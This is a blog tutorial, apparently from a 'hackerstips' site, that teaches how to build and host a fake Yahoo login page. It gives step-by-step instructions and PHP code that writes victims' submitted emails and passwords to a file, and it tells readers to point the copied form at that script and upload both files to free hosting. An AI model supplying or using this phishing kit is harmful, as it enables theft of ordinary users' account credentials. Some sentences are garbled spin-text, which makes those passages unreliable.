{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
Now you can appearance it by accounting the url in the abode bar.
NOTE: If u wish to forward it to the internet, again aboriginal you will accept to actualize a hosting annual which you can actualize on www.110mb.com and YOU can search for it
http://hackerstips.blogspot.com/2011/06/free-website-hosting-site-list-how-to.html



http://hackerstips.blogspot.com/2011/06/top-10-web-hosting-companies-of-2011.html



I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url of the file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.














Create Fake Login Page For Yahoo|Hack Yahoo By Phishing



1.First go to Yahoo’s login page “https://login.yahoo.com/config/login_verify2?&.src=ym”

2.Right click on the page and go to “View Page Source”.


3.You will see the whole HTML coding in it of the page(Huge huh ?).

4.Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C

5.Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Yahoo.htm’

6.Then you have to make a login.php file.For that, open another text document and paste the
following HTML code in it

<?php /* Created on: 3/27/2009 */
$fp = fopen(“YahooPasswords.htm”, “a”);
fwrite($fp, “Email:$_POST[ID name="***"]\tPassword:$_POST[PASS name="***"]“);
echo “<HTML>

<head>
<title>hackerstips</title>

<FRAMESET cols=\”*\”>

<FRAME SRC=\”http://www.hackerstips.blogspot.com\”>


</FRAMESET>”;?>

In this Code Change only the following ie. if you want to change it

a.”YahooPasswords.htm”

b.”<title>Hackerstips<title/>”

c.”http://www.hackerstips.blogspot.com\” but don’t forget ‘\’ after the destined URL.

d.”3/27/2009″

e.”Email:” & “Password:”


7.Then save this document as ‘Login.php’.

8.Now to got to ‘Yahoo.htm’ and find (CTRL+F) ‘action’.

9.You will find something that likes like this action=”https://login.yahoo.com/config/login?” .


10.Change it to action=”/login.php”

12.Now find ‘Yahoo! ID’ and in the next line or near it you will find name=”login” (see closely)

So,here the id is ‘username’.(if ‘id’ does not exist then take the id=”**” or make a name=’**’ ,it is always there in
in yahoo)

13.Now, go back to login.php and replace ID name=”***” with ‘login’ (since name=’login’)




14.Find ‘Password’ and in the next line you will find name=’passwd’.So the name is ‘passwd’.Replace it with PASS name=’passwd’ with ‘passwd’


NOTE: Do not include ‘ in login.php.For example Email:$_POST[login

15.Save both the files.




16.Upload them into any free hosting website like t35.com.Do not upload them into a directory!

17.Then to test it just type in some usename and password.

18.Refresh the control panel (the place where you uploaded the files) and them you will find
‘YahooPasswords.htm’ which is created and when you open it you will find the username and password that you entered.







Total Pageviews

Recent Comments

Recent Posts